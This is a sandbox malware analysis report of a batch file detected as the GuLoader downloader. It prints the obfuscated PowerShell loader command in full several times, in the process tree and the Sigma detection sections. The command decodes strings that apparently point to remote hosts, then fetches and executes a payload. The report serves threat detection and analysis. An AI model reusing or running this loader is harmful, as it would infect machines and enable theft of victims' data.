Edit tour

Windows Analysis Report
ORDER AND CATALOG 01.bat

Overview

General Information

Sample name:	ORDER AND CATALOG 01.bat
Analysis ID:	1562494
MD5:	48eb61ad0c88221857d8cf3e96d58525
SHA1:	724b144e7bbabd011ca04d0d140ede4e47e7ec71
SHA256:	fa9838f5471d4c21d2f8a2f6def009de4bcfad8e5794cc0be33b31e11c5d8fb9
Infos:

Detection

GuLoader

Score:	60
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected GuLoader

Suspicious powershell command line found

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

May sleep (evasive loops) to hinder dynamic analysis

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Classification

Process Tree

System is w10x64_ra

cmd.exe (PID: 6432 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ORDER AND CATALOG 01.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6852 cmdline: powershell.exe -windowstyle hidden ";$Pukka='Drillevorn';;$Additionstegnenes='Drftede165';;$Neri='Thebain';;$Asteroidens='Outsling';;$Daarskab='Calamopitys';;$gastons=$host.Name;function Galskaber65($Paretically){If ($gastons) {$Chemiuserzation191=5} for ($Thinkings=$Chemiuserzation191;;$Thinkings+=6){if(!$Paretically[$Thinkings]) { break }$Kondenseringerne+=$Paretically[$Thinkings]}$Kondenseringerne}function bearbejdeligste($Fagidioternes){ .($Medunderskriv) ($Fagidioternes)}$Succinctory46=Galskaber65 'RestinMediteIngm.tM.tho. Drifwelskoe hjembTelefCirreclbowleiLasereAncylnSaurut';$hjulpiskere=Galskaber65 'Inde,M Gardo s adzEkspriStrumlStr.plSliksaStrel/';$Wiggas=Galskaber65 'ElbilT,ontrlRygdksTrlso1Arn s2';$husholderisk='Egne [InvirNSu plE Pr gTTeg o.HjspnSBirdleSkg,rRTilgivDiapaI GawgCFor iEGrshoPFr boO iarii Fo onlang tUdsyrmLivsfaChartNBajonaPo.ygginoffeDo.inrElekt]Hydr :Udnyt: TidsSSk riev nfuCCnemiU K ncrUni.ei.uesttAutopySkrifpSge rr sphaO esudtOmskiOkonstcShrieoUnspelRe da= Arme$UdpumwstrewI A.ndGTeknoGStal aBu.keS';$hjulpiskere+=Galskaber65 'S bar5Forpl.Ligus0Rhapo Ganga( kultW Unw iVinstngnetadRebutoPectowM zzlsMarke H,emmNEkspoT ysse mana1Cerva0H eml.Overc0Aftwa;Pre t FrivoWtrussi Pl mn acif6 Ni h4Digre; Pela AvocaxL ftn6 Sa.o4Mesot;Blaat F gtnr D,sqv .ont:Trolo1Monoc3Revei1 sp c. Or m0Hyper) Jaev ReverGV ndierappocFunktkGrutno Rest/ Marc2dowha0Bivaa1Fod n0Pili.0Tivol1Redif0 Berb1Hypos Pa aF E,oti ultrGenite ForsfValuto Injux red/ Util1Krkli3 Frey1Sa.di.Afgr 0';$Vampirish=Galskaber65 ' PsycU BlacsTegneENatteR op.a-MisemaF lklGSkrmbePharyNRodenT';$Stokken=Galskaber65 'Elekth SandtNef,nt Subvp DigisHaema:Holda/ orbi/ kovsc AnsvoUsk.dhUnbuyaTiff bHype iMessatM onlaBefaliResepsanden.SilkerHaveeuKolle.Stttec UntioSiphomTecto/H ghvc,orsts HvedsSchin- ekos/degerOMerckvServeeBanker Forls lfooP eseeHovediFaeposBe.rakEc.oceMaled.Preo aUdskrskvabad Si s>DrifthOrkant Wh mtMalispNonalsImams:Frem /Met i/IndvenUsel rTegnk.FitchyRestiy Stran ulkodCaprizg oseq Pa e2 Mulc. Nonis Stuba Thed. iskcChuckoTot mmMicro/Pictuc ColugBetweiSolid_Dili,bCa diinoninnVrd.h/Lnk rOPs,udvNarc eNoni r NdrisBankfoF.rreeNonrhiU stys Lea kVideoe Unge. nisaa matrs Uns d';$Dogwinkle=Galskaber65 'Bivua>';$Medunderskriv=Galskaber65 'udskrIPlie,e,iskeX';$Overspille='secco';$Blossoms='\Suspendibility.Lum';bearbejdeligste (Galskaber65 'Sojas$MisguGAl mnl DetaOMet lBFlsenaBrierl,ugnl: Empod dskiO hegugRustnMStopkaPsychtStr kIFil iSProceMIs ndEAnathrJazzb= Rdle$AroineUpheanRevelV,tjer:CreneAForhapTristP lossDfiletAsuperTForseaForbr+Bidra$BjergbGoy,mlUnreqoSkomaSTrediSDe,mnoFlowcmVellas');bearbejdeligste (Galskaber65 'Un.lo$UnbrigClausLInforOPapirbMas.iAUn erLModfa:Tiaaro C rymRapshf,nkilAP pulNHyletgGlosaSbrunibRhkluEB,rgedFlammmAccruM .inieAnkyll GarrsForbiE NandNA,tob=Latti$OptigSStjmatKejseOBushrK nathKRes tEAflasN Spal.S uttS UntwpSig elDe,enIGlisttIconi(Grop,$Lyn hD De.roUds jG.fsenWFa rdiKj.rsNAmtsvKBruttL a aheUdsag)');bearbejdeligste (Galskaber65 $husholderisk);$Stokken=$Omfangsbedmmelsen[0];$Trmlkspulvers=(Galskaber65 'Ak ue$ContoGDecatLExcelOEpi aBTropiA MogilDueho:duntpr oloeFashiTVgttanKir,eIEgetrnSambeg HerieF,uidnB indSNeigh=ResisNPejsee IndiwFloor-DanseOPag,nbPinstJTatoveDa abcaudiotBlasp CullssBiconyAftgtsEksteTU wadEunfismM.som.S,lli$gestusPlumaUSpionCDaasecPruniiP.piln FlokcVurdeTfirecoIn,epr AudiYOverb4F ksi6');bearbejdeligste ($Trmlkspulvers);bearbejdeligste (Galskaber65 'G.ama$OmbygRPrehee Altut ipern AduliSymasnAtta gG aste Non n Defls Norm.DakarHAssime ,edraMastodKo,poe .torrT phasKerne[P eci$CelibVCollaadrukkmpe kipSuperi rstersagsfiRevirsE,otrhRide,]Butte=Delta$Aborahstigmj iktuu astrlUnsedpBehi.iGenensPinxakDramae ScenrOctoae');$Detektivarbejdet=Galskaber65 'Un.st$ FasaRUnmise TetttTilf nKureriAphornstrgbgGuggleMedianSv.sks Stan.Rew iDLysstoElfinwKaolinRunkelArr,voBetonaopk ld LeptF BiosiKorrelSikkeeIrrep(T ksi$Gu dgSDrif tP dagobor ekSubc,k UngaeOrnamnFamil, Gob,$ DolkKShetlo S ifnFarsekBiopsuTra srLykkerskrive utsenStedscTillge,xelskCeleblMilieaKeelbuSindss mykkuBeslal DiadsApp l)';$Konkurrenceklausuls=$Dogmatismer;bearbejdeligste (Galskaber65 'Y xbr$OvereGBand L Ef,eomugwob EmulAJournL Bi.l: Re kDS uffEP.ftesMosc o hellrBlodrIbascue Fin nStbl Tp ojeE palpROutboee,mannNitreDRege eVinif=L asb(RequoT ,aniePolitS.arddT fore-Unde,pJarrea DemotHjderH Cant Sk d$K mpoKAfviko HensnVidapkGrillU Ve rr,acotRRu.neEDiskanDescrCDecidESlambK Fordl fslaRatefU ,onosBarn UkantoLRe ulsLo aa)');while (!$Desorienterende) {bearbejdeligste (Galskaber65 'Antim$PathogCottalBort.oSvartbDybgra ,trulAntiw:FoetaRRaadpo no cdRislefJetj sme,tot rifte Co edRd,bbe Con =Blokn$ Em.tnVinreoGtevinHajiskdirkeo Whi mYipesbSp tiaBetydtLowbrt ordkaWretcn Demot') ;bearbejdeligste $Detektivarbejdet;bearbejdeligste (Galskaber65 ' happs,orvrTEverba rveprReserTMen a- Cycls PersLUncumePollee GenipEn,ra enkel4');bearbejdeligste (Galskaber65 'Far.e$KapelG NestlD liboDemo bEn iraRembolKalkp: Mis,D MadkeSpeciSTrykoo ,ineR BirkINoni eRe.ten.estotEvergEBoyarRinduteNaz snEkstrDcriocESupe.=Perso(KldedtChelaePimpis VivitVanar- SeksPStruta PupftAkaciHPaa r Presu$TugthkAfsmaOSkolaN rigukB.gdrUFyrtar Vocar SlutELilibNDistuCreverE ransK GaaslS ldaaHe teUMaltfsT ngiuSprinl eartsLntry)') ;bearbejdeligste (Galskaber65 'B war$Kom iG ErotLLageno coptBThermA JannLBotsw:,ileiSEngagT haleAMargeTUnciaUAffalA PariRTopcaI.reposTheatK aste= Nida$PladaGPa aeL OutsOLegioBCluinaT,leoLOmfav: dhngKStrafVSma saStolsdSalvir GulnAbromoTUnderE.helfR inacn urleEJug t+ Need+roter%Thor $ Dy eoL.ehumBatteFOversAcrawbnGlostGBravusAcal bPopuleDitisdExistM IngeM Mo,pEUltralVitelsLsnineH,inonGldfr.OptagCEgenco SubcuPr stNTiltvt') ;$Stokken=$Omfangsbedmmelsen[$Statuarisk]}$Lavable=319703;$Laminiform=31271;bearbejdeligste (Galskaber65 ' Geya$t lbagSyreflV,dgaOBakelB bdoma aaslBlegn: kjteb pacheKaramruntratRei ohMis.rSFrogc Wabbl=Sug.s ,garigSkurvEFimseTFara -Beti CBe kuofurl.nDasyptUnperE krblNPte yT Ratt T,den$ ctinkSuperoLegalN affek SeleUOphobr ebbeRPostoEBemaeNSpecicEfterEEncepk,romplEisopAIsopruVedtas NookUFloatl aadeS');bearbejdeligste (Galskaber65 '.asth$J lligResyml urbroSawmabDifteaUnclolScala:MetroR PensePhrenb S edsKansllCalliaRohergTagkoeTrefarInergsSejrs Curre= Fi,s Friha[ RollSObducy,pokasDi cutunbeleDjehamFemma. AttrCUsselo RealnV,kstvS.mipeOmnorrRverktI sti] mala: Unre:SleepFSidesr .keeo Reexm Til.BMin.sa PeddsLeddeeAnti.6Afb k4Sju.kSHeksetAssurrDigesipreilnZoologRekla(Rossi$DitalBk icheSentirTrnertpaalihrea is Puzz)');bearbejdeligste (Galskaber65 'Hclth$ OvergArbejlBegrioWorshbCoursaFan.eL tape:PicinC Ef.eoKirkelBloknPPinceOComplP.riseE UnmaRteraiiDa.renPlanoEDi etO sn.grUn,adRTanglHRiddeaSmeeupHyperHTrillY Re s alda=Rodet prs d[AngorsRega YSmeltSUdanstProfeeTransMHakke.OverdTSugereGodkeX ystbtKinet.MonimEUnnesN onstCOrganoKonfedAfh,gIDiagnN inegruskn].tjer: ,kra:CorreaBekveSGo.dfCMineri In,ei Rib . DysfGRegreEpronoTfasciSPerspttournRFajaniB ugeNRutlagAarso(Aque $ MudpRCam.ae B pobEfte SNichilspiksa dringAflb,e en.lrDysmes ver)');bearbejdeligste (Galskaber65 'unsus$hardlG Iri LVrnepOu munbRuddiAStdp,lBltes:InteriBacksnPrimstTr nsest.atrElocuJTapetaCentrCFarveuP rdalRidicaSubcltUnp eENatiodKetoxE In rD etro=Medic$Ba,leC RecaOSnepplRoterPKris OInte.p S,oweDecomrStraiI undenP anoeKogero SickrSomatrSociaHd.absa Paksp Tr shA preYFaldl.Box,esBistauJanikB CounsHagmatKon erPintai,allinOpl nGPat i(Infra$ KiloL iameAMiserV ve aaAflevB ,hamlPrangeDronn,Wanto$ atallLechaaAliyaMTritii LamenAssayiAlbatFForreOSu,gir GnapMYvonu)');bearbejdeligste $Interjaculateded;" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

svchost.exe (PID: 7108 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

powershell.exe (PID: 5076 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Pukka='Drillevorn';;$Additionstegnenes='Drftede165';;$Neri='Thebain';;$Asteroidens='Outsling';;$Daarskab='Calamopitys';;$gastons=$host.Name;function Galskaber65($Paretically){If ($gastons) {$Chemiuserzation191=5} for ($Thinkings=$Chemiuserzation191;;$Thinkings+=6){if(!$Paretically[$Thinkings]) { break }$Kondenseringerne+=$Paretically[$Thinkings]}$Kondenseringerne}function bearbejdeligste($Fagidioternes){ .($Medunderskriv) ($Fagidioternes)}$Succinctory46=Galskaber65 'RestinMediteIngm.tM.tho. Drifwelskoe hjembTelefCirreclbowleiLasereAncylnSaurut';$hjulpiskere=Galskaber65 'Inde,M Gardo s adzEkspriStrumlStr.plSliksaStrel/';$Wiggas=Galskaber65 'ElbilT,ontrlRygdksTrlso1Arn s2';$husholderisk='Egne [InvirNSu plE Pr gTTeg o.HjspnSBirdleSkg,rRTilgivDiapaI GawgCFor iEGrshoPFr boO iarii Fo onlang tUdsyrmLivsfaChartNBajonaPo.ygginoffeDo.inrElekt]Hydr :Udnyt: TidsSSk riev nfuCCnemiU K ncrUni.ei.uesttAutopySkrifpSge rr sphaO esudtOmskiOkonstcShrieoUnspelRe da= Arme$UdpumwstrewI A.ndGTeknoGStal aBu.keS';$hjulpiskere+=Galskaber65 'S bar5Forpl.Ligus0Rhapo Ganga( kultW Unw iVinstngnetadRebutoPectowM zzlsMarke H,emmNEkspoT ysse mana1Cerva0H eml.Overc0Aftwa;Pre t FrivoWtrussi Pl mn acif6 Ni h4Digre; Pela AvocaxL ftn6 Sa.o4Mesot;Blaat F gtnr D,sqv .ont:Trolo1Monoc3Revei1 sp c. Or m0Hyper) Jaev ReverGV ndierappocFunktkGrutno Rest/ Marc2dowha0Bivaa1Fod n0Pili.0Tivol1Redif0 Berb1Hypos Pa aF E,oti ultrGenite ForsfValuto Injux red/ Util1Krkli3 Frey1Sa.di.Afgr 0';$Vampirish=Galskaber65 ' PsycU BlacsTegneENatteR op.a-MisemaF lklGSkrmbePharyNRodenT';$Stokken=Galskaber65 'Elekth SandtNef,nt Subvp DigisHaema:Holda/ orbi/ kovsc AnsvoUsk.dhUnbuyaTiff bHype iMessatM onlaBefaliResepsanden.SilkerHaveeuKolle.Stttec UntioSiphomTecto/H ghvc,orsts HvedsSchin- ekos/degerOMerckvServeeBanker Forls lfooP eseeHovediFaeposBe.rakEc.oceMaled.Preo aUdskrskvabad Si s>DrifthOrkant Wh mtMalispNonalsImams:Frem /Met i/IndvenUsel rTegnk.FitchyRestiy Stran ulkodCaprizg oseq Pa e2 Mulc. Nonis Stuba Thed. iskcChuckoTot mmMicro/Pictuc ColugBetweiSolid_Dili,bCa diinoninnVrd.h/Lnk rOPs,udvNarc eNoni r NdrisBankfoF.rreeNonrhiU stys Lea kVideoe Unge. nisaa matrs Uns d';$Dogwinkle=Galskaber65 'Bivua>';$Medunderskriv=Galskaber65 'udskrIPlie,e,iskeX';$Overspille='secco';$Blossoms='\Suspendibility.Lum';bearbejdeligste (Galskaber65 'Sojas$MisguGAl mnl DetaOMet lBFlsenaBrierl,ugnl: Empod dskiO hegugRustnMStopkaPsychtStr kIFil iSProceMIs ndEAnathrJazzb= Rdle$AroineUpheanRevelV,tjer:CreneAForhapTristP lossDfiletAsuperTForseaForbr+Bidra$BjergbGoy,mlUnreqoSkomaSTrediSDe,mnoFlowcmVellas');bearbejdeligste (Galskaber65 'Un.lo$UnbrigClausLInforOPapirbMas.iAUn erLModfa:Tiaaro C rymRapshf,nkilAP pulNHyletgGlosaSbrunibRhkluEB,rgedFlammmAccruM .inieAnkyll GarrsForbiE NandNA,tob=Latti$OptigSStjmatKejseOBushrK nathKRes tEAflasN Spal.S uttS UntwpSig elDe,enIGlisttIconi(Grop,$Lyn hD De.roUds jG.fsenWFa rdiKj.rsNAmtsvKBruttL a aheUdsag)');bearbejdeligste (Galskaber65 $husholderisk);$Stokken=$Omfangsbedmmelsen[0];$Trmlkspulvers=(Galskaber65 'Ak ue$ContoGDecatLExcelOEpi aBTropiA MogilDueho:duntpr oloeFashiTVgttanKir,eIEgetrnSambeg HerieF,uidnB indSNeigh=ResisNPejsee IndiwFloor-DanseOPag,nbPinstJTatoveDa abcaudiotBlasp CullssBiconyAftgtsEksteTU wadEunfismM.som.S,lli$gestusPlumaUSpionCDaasecPruniiP.piln FlokcVurdeTfirecoIn,epr AudiYOverb4F ksi6');bearbejdeligste ($Trmlkspulvers);bearbejdeligste (Galskaber65 'G.ama$OmbygRPrehee Altut ipern AduliSymasnAtta gG aste Non n Defls Norm.DakarHAssime ,edraMastodKo,poe .torrT phasKerne[P eci$CelibVCollaadrukkmpe kipSuperi rstersagsfiRevirsE,otrhRide,]Butte=Delta$Aborahstigmj iktuu astrlUnsedpBehi.iGenensPinxakDramae ScenrOctoae');$Detektivarbejdet=Galskaber65 'Un.st$ FasaRUnmise TetttTilf nKureriAphornstrgbgGuggleMedianSv.sks Stan.Rew iDLysstoElfinwKaolinRunkelArr,voBetonaopk ld LeptF BiosiKorrelSikkeeIrrep(T ksi$Gu dgSDrif tP dagobor ekSubc,k UngaeOrnamnFamil, Gob,$ DolkKShetlo S ifnFarsekBiopsuTra srLykkerskrive utsenStedscTillge,xelskCeleblMilieaKeelbuSindss mykkuBeslal DiadsApp l)';$Konkurrenceklausuls=$Dogmatismer;bearbejdeligste (Galskaber65 'Y xbr$OvereGBand L Ef,eomugwob EmulAJournL Bi.l: Re kDS uffEP.ftesMosc o hellrBlodrIbascue Fin nStbl Tp ojeE palpROutboee,mannNitreDRege eVinif=L asb(RequoT ,aniePolitS.arddT fore-Unde,pJarrea DemotHjderH Cant Sk d$K mpoKAfviko HensnVidapkGrillU Ve rr,acotRRu.neEDiskanDescrCDecidESlambK Fordl fslaRatefU ,onosBarn UkantoLRe ulsLo aa)');while (!$Desorienterende) {bearbejdeligste (Galskaber65 'Antim$PathogCottalBort.oSvartbDybgra ,trulAntiw:FoetaRRaadpo no cdRislefJetj sme,tot rifte Co edRd,bbe Con =Blokn$ Em.tnVinreoGtevinHajiskdirkeo Whi mYipesbSp tiaBetydtLowbrt ordkaWretcn Demot') ;bearbejdeligste $Detektivarbejdet;bearbejdeligste (Galskaber65 ' happs,orvrTEverba rveprReserTMen a- Cycls PersLUncumePollee GenipEn,ra enkel4');bearbejdeligste (Galskaber65 'Far.e$KapelG NestlD liboDemo bEn iraRembolKalkp: Mis,D MadkeSpeciSTrykoo ,ineR BirkINoni eRe.ten.estotEvergEBoyarRinduteNaz snEkstrDcriocESupe.=Perso(KldedtChelaePimpis VivitVanar- SeksPStruta PupftAkaciHPaa r Presu$TugthkAfsmaOSkolaN rigukB.gdrUFyrtar Vocar SlutELilibNDistuCreverE ransK GaaslS ldaaHe teUMaltfsT ngiuSprinl eartsLntry)') ;bearbejdeligste (Galskaber65 'B war$Kom iG ErotLLageno coptBThermA JannLBotsw:,ileiSEngagT haleAMargeTUnciaUAffalA PariRTopcaI.reposTheatK aste= Nida$PladaGPa aeL OutsOLegioBCluinaT,leoLOmfav: dhngKStrafVSma saStolsdSalvir GulnAbromoTUnderE.helfR inacn urleEJug t+ Need+roter%Thor $ Dy eoL.ehumBatteFOversAcrawbnGlostGBravusAcal bPopuleDitisdExistM IngeM Mo,pEUltralVitelsLsnineH,inonGldfr.OptagCEgenco SubcuPr stNTiltvt') ;$Stokken=$Omfangsbedmmelsen[$Statuarisk]}$Lavable=319703;$Laminiform=31271;bearbejdeligste (Galskaber65 ' Geya$t lbagSyreflV,dgaOBakelB bdoma aaslBlegn: kjteb pacheKaramruntratRei ohMis.rSFrogc Wabbl=Sug.s ,garigSkurvEFimseTFara -Beti CBe kuofurl.nDasyptUnperE krblNPte yT Ratt T,den$ ctinkSuperoLegalN affek SeleUOphobr ebbeRPostoEBemaeNSpecicEfterEEncepk,romplEisopAIsopruVedtas NookUFloatl aadeS');bearbejdeligste (Galskaber65 '.asth$J lligResyml urbroSawmabDifteaUnclolScala:MetroR PensePhrenb S edsKansllCalliaRohergTagkoeTrefarInergsSejrs Curre= Fi,s Friha[ RollSObducy,pokasDi cutunbeleDjehamFemma. AttrCUsselo RealnV,kstvS.mipeOmnorrRverktI sti] mala: Unre:SleepFSidesr .keeo Reexm Til.BMin.sa PeddsLeddeeAnti.6Afb k4Sju.kSHeksetAssurrDigesipreilnZoologRekla(Rossi$DitalBk icheSentirTrnertpaalihrea is Puzz)');bearbejdeligste (Galskaber65 'Hclth$ OvergArbejlBegrioWorshbCoursaFan.eL tape:PicinC Ef.eoKirkelBloknPPinceOComplP.riseE UnmaRteraiiDa.renPlanoEDi etO sn.grUn,adRTanglHRiddeaSmeeupHyperHTrillY Re s alda=Rodet prs d[AngorsRega YSmeltSUdanstProfeeTransMHakke.OverdTSugereGodkeX ystbtKinet.MonimEUnnesN onstCOrganoKonfedAfh,gIDiagnN inegruskn].tjer: ,kra:CorreaBekveSGo.dfCMineri In,ei Rib . DysfGRegreEpronoTfasciSPerspttournRFajaniB ugeNRutlagAarso(Aque $ MudpRCam.ae B pobEfte SNichilspiksa dringAflb,e en.lrDysmes ver)');bearbejdeligste (Galskaber65 'unsus$hardlG Iri LVrnepOu munbRuddiAStdp,lBltes:InteriBacksnPrimstTr nsest.atrElocuJTapetaCentrCFarveuP rdalRidicaSubcltUnp eENatiodKetoxE In rD etro=Medic$Ba,leC RecaOSnepplRoterPKris OInte.p S,oweDecomrStraiI undenP anoeKogero SickrSomatrSociaHd.absa Paksp Tr shA preYFaldl.Box,esBistauJanikB CounsHagmatKon erPintai,allinOpl nGPat i(Infra$ KiloL iameAMiserV ve aaAflevB ,hamlPrangeDronn,Wanto$ atallLechaaAliyaMTritii LamenAssayiAlbatFForreOSu,gir GnapMYvonu)');bearbejdeligste $Interjaculateded;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.1300165087.000002D446AB3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security
0000000B.00000002.2462628571.0000000009B40000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security
0000000B.00000002.2438738602.0000000005C84000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security
0000000B.00000002.2462762606.000000000E361000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Signatures

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden ";$Pukka='Drillevorn';;$Additionstegnenes='Drftede165';;$Neri='Thebain';;$Asteroidens='Outsling';;$Daarskab='Calamopitys';;$gastons=$host.Name;function Galskaber65($Paretically){If ($gastons) {$Chemiuserzation191=5} for ($Thinkings=$Chemiuserzation191;;$Thinkings+=6){if(!$Paretically[$Thinkings]) { break }$Kondenseringerne+=$Paretically[$Thinkings]}$Kondenseringerne}function bearbejdeligste($Fagidioternes){ .($Medunderskriv) ($Fagidioternes)}$Succinctory46=Galskaber65 'RestinMediteIngm.tM.tho. Drifwelskoe hjembTelefCirreclbowleiLasereAncylnSaurut';$hjulpiskere=Galskaber65 'Inde,M Gardo s adzEkspriStrumlStr.plSliksaStrel/';$Wiggas=Galskaber65 'ElbilT,ontrlRygdksTrlso1Arn s2';$husholderisk='Egne [InvirNSu plE Pr gTTeg o.HjspnSBirdleSkg,rRTilgivDiapaI GawgCFor iEGrshoPFr boO iarii Fo onlang tUdsyrmLivsfaChartNBajonaPo.ygginoffeDo.inrElekt]Hydr :Udnyt: TidsSSk riev nfuCCnemiU K ncrUni.ei.uesttAutopySkrifpSge rr sphaO esudtOmskiOkonstcShrieoUnspelRe da= Arme$UdpumwstrewI A.ndGTeknoGStal aBu.keS';$hjulpiskere+=Galskaber65 'S bar5Forpl.Ligus0Rhapo Ganga( kultW Unw iVinstngnetadRebutoPectowM zzlsMarke H,emmNEkspoT ysse mana1Cerva0H eml.Overc0Aftwa;Pre t FrivoWtrussi Pl mn acif6 Ni h4Digre; Pela AvocaxL ftn6 Sa.o4Mesot;Blaat F gtnr D,sqv .ont:Trolo1Monoc3Revei1 sp c. Or m0Hyper) Jaev ReverGV ndierappocFunktkGrutno Rest/ Marc2dowha0Bivaa1Fod n0Pili.0Tivol1Redif0 Berb1Hypos Pa aF E,oti ultrGenite ForsfValuto Injux red/ Util1Krkli3 Frey1Sa.di.Afgr 0';$Vampirish=Galskaber65 ' PsycU BlacsTegneENatteR op.a-MisemaF lklGSkrmbePharyNRodenT';$Stokken=Galskaber65 'Elekth SandtNef,nt Subvp DigisHaema:Holda/ orbi/ kovsc AnsvoUsk.dhUnbuyaTiff bHype iMessatM onlaBefaliResepsanden.SilkerHaveeuKolle.Stttec UntioSiphomTecto/H ghvc,orsts HvedsSchin- ekos/degerOMerckvServeeBanker Forls lfooP eseeHovediFaeposBe.rakEc.oceMaled.Preo aUdskrskvabad Si s>DrifthOrkant Wh mtMalispNonalsImams:Frem /Met i/IndvenUsel rTegnk.FitchyRestiy Stran ulkodCaprizg oseq Pa e2 Mulc. Nonis Stuba Thed. iskcChuckoTot mmMicro/Pictuc ColugBetweiSolid_Dili,bCa diinoninnVrd.h/Lnk rOPs,udvNarc eNoni r NdrisBankfoF.rreeNonrhiU stys Lea kVideoe Unge. nisaa matrs Uns d';$Dogwinkle=Galskaber65 'Bivua>';$Medunderskriv=Galskaber65 'udskrIPlie,e,iskeX';$Overspille='secco';$Blossoms='\Suspendibility.Lum';bearbejdeligste (Galskaber65 'Sojas$MisguGAl mnl DetaOMet lBFlsenaBrierl,ugnl: Empod dskiO hegugRustnMStopkaPsychtStr kIFil iSProceMIs ndEAnathrJazzb= Rdle$AroineUpheanRevelV,tjer:CreneAForhapTristP lossDfiletAsuperTForseaForbr+Bidra$BjergbGoy,mlUnreqoSkomaSTrediSDe,mnoFlowcmVellas');bearbejdeligste (Galskaber65 'Un.lo$UnbrigClausLInforOPapirbMas.iAUn erLModfa:Tiaaro C rymRapshf,nkilAP pulNHyletgGlosaSbrunibRhkluEB,rgedFlammmAccruM .inieAnkyll GarrsForbiE NandNA,tob=Latti$OptigSStjmatKejseOBushrK nathKRes tEAflasN Spal.S uttS UntwpSig elDe,enIGlisttIconi(Grop,$Lyn hD De.roUds jG.fsenWFa rdiKj.rsNAmtsvKBruttL a aheUdsag)');bearbejdeligste (Galskaber65 $husholderis

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 656, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7108, ProcessName: svchost.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Source: unknown

HTTPS traffic detected: 103.83.194.50:443 -> 192.168.2.16:49702 version: TLS 1.2

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: cohabitais.ru.com

Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702

Source: unknown

HTTPS traffic detected: 103.83.194.50:443 -> 192.168.2.16:49702 version: TLS 1.2

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 7526
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 7526
Source: unknown	Process created: Commandline size = 7550

Source: classification engine

Classification label: mal60.troj.winBAT@8/7@1/38

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Suspendibility.Lum

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7024:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
